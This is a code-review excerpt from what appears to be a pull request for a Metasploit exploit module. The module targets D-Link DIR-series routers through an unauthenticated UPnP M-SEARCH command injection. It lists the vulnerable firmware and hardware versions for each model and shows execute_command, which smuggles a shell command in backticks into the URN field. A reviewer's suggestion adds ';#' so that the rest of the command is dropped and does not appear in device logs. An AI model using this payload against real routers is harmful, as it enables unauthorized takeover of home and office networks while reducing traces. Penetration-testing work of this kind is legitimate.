modules/exploits/linux/upnp/dlink_msearch_unauth_lan_rce.rb

```diff
@@ -0,0 +1,367 @@
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.04') && @d_link['hardware'][0] == 'B'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.05') && @d_link['hardware'][0] == 'A'
+    when 'DIR-822'
+      @d_link['arch'] = 'mipsbe'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.03') && @d_link['hardware'][0] == 'B'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('3.12') && @d_link['hardware'][0] == 'C'
+    when 'DIR-823'
+      @d_link['arch'] = 'mipsbe'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.00') && @d_link['hardware'][0] == 'A'
+    when 'DIR-850L'
+      @d_link['arch'] = 'mipsbe'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && (@d_link['hardware'][0] == 'A' || @d_link['hardware'] == 'N/A')
+    when 'DIR-859'
+      @d_link['arch'] = 'mipsbe'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.06') && @d_link['hardware'][0] == 'A'
+    when 'DIR-860L'
+      @d_link['arch'] = 'armle'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.10') && @d_link['hardware'][0] == 'A'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.03') && @d_link['hardware'][0] == 'B'
+    when 'DIR-865L'
+      @d_link['arch'] = 'mipsle'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.07') && @d_link['hardware'][0] == 'A'
+    when 'DIR-868L'
+      @d_link['arch'] = 'armle'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('2.05') && @d_link['hardware'][0] == 'B'
+    when 'DIR-869'
+      @d_link['arch'] = 'mipsbe'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.03') && @d_link['hardware'][0] == 'A'
+    when 'DIR-880L'
+      @d_link['arch'] = 'armle'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.08') && @d_link['hardware'][0] == 'A'
+    when 'DIR-890L', 'DIR-890R'
+      @d_link['arch'] = 'armle'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.11') && @d_link['hardware'][0] == 'A'
+    when 'DIR-885L', 'DIR-885R'
+      @d_link['arch'] = 'armle'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
+    when 'DIR-895L', 'DIR-895R'
+      @d_link['arch'] = 'armle'
+      return true if Rex::Version.new(@d_link['firmware']) <= Rex::Version.new('1.12') && @d_link['hardware'][0] == 'A'
+    end
+    false
+  end
+
+  def execute_command(cmd, _opts = {})
+    if datastore['URN']
+      payload = "#{datastore['URN']};`#{cmd}`"
+    else
+      payload = "urn:device:1;`#{cmd}`"
```

Comment:
```suggestion
      payload = "#{datastore['URN']};`#{cmd};#`"
    else
      payload = "urn:device:1;`#{cmd}`;#"
```

no need to have the rest of the command executed and showing up as an error in a log file somewhere.